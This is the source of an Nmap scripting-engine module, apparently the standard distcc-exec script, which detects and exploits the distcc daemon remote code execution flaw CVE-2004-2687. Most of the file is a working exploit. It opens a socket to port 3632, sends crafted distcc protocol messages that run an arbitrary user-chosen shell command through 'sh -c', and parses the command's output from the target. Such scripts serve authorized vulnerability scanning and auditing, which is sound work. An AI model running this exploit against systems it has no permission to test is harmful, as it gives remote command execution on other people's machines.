1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
|
local nmap = require "nmap"
local match = require "match"
local shortport = require "shortport"
local stdnse = require "stdnse"
local vulns = require "vulns"
description = [[
Detects and exploits a remote code execution vulnerability in the distributed
compiler daemon distcc. The vulnerability was disclosed in 2002, but is still
present in modern implementation due to poor configuration of the service.
]]
---
-- @usage
-- nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
--
-- @output
-- PORT STATE SERVICE
-- 3632/tcp open distccd
-- | distcc-exec:
-- | VULNERABLE:
-- | distcc Daemon Command Execution
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE:CVE-2004-2687
-- | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
-- | Description:
-- | Allows executing of arbitrary commands on systems running distccd 3.1 and
-- | earlier. The vulnerability is the consequence of weak service configuration.
-- |
-- | Disclosure date: 2002-02-01
-- | Extra information:
-- |
-- | uid=118(distccd) gid=65534(nogroup) groups=65534(nogroup)
-- |
-- | References:
-- | https://distcc.github.io/security.html
-- | https://nvd.nist.gov/vuln/detail/CVE-2004-2687
-- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
--
-- @args cmd the command to run at the remote server
--
author = "Patrik Karlsson"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit", "intrusive", "vuln"}
portrule = shortport.port_or_service(3632, "distcc")
local arg_cmd = stdnse.get_script_args(SCRIPT_NAME .. '.cmd') or "id"
local function fail(err) return stdnse.format_output(false, err) end
action = function(host, port)
local distcc_vuln = {
title = "distcc Daemon Command Execution",
IDS = {CVE = 'CVE-2004-2687'},
risk_factor = "High",
scores = {
CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)",
},
description = [[
Allows executing of arbitrary commands on systems running distccd 3.1 and
earlier. The vulnerability is the consequence of weak service configuration.
]],
references = {
'https://nvd.nist.gov/vuln/detail/CVE-2004-2687',
'https://distcc.github.io/security.html',
},
dates = { disclosure = {year = '2002', month = '02', day = '01'}, },
exploit_results = {},
}
local report = vulns.Report:new(SCRIPT_NAME, host, port)
distcc_vuln.state = vulns.STATE.NOT_VULN
local socket = nmap.new_socket()
if ( not(socket:connect(host, port)) ) then
return fail("Failed to connect to distcc server")
end
local cmds = {
"DIST00000001",
("ARGC00000008ARGV00000002shARGV00000002-cARGV%08.8xsh -c " ..
"'(%s)'ARGV00000001#ARGV00000002-cARGV00000006main.cARGV00000002" ..
"-oARGV00000006main.o"):format(10 + #arg_cmd, arg_cmd),
"DOTI00000001A\n",
}
for _, cmd in ipairs(cmds) do
if ( not(socket:send(cmd)) ) then
return fail("Failed to send data to distcc server")
end
end
-- Command could have lots of output, need to cut it off somewhere. 4096 should be enough.
local status, data = socket:receive_buf(match.pattern_limit("DOTO00000000", 4096), false)
if ( status ) then
local output = data:match("SOUT%w%w%w%w%w%w%w%w(.*)")
if (output and #output > 0) then
distcc_vuln.extra_info = stdnse.format_output(true, output)
distcc_vuln.state = vulns.STATE.EXPLOIT
return report:make_output(distcc_vuln)
end
end
end
|
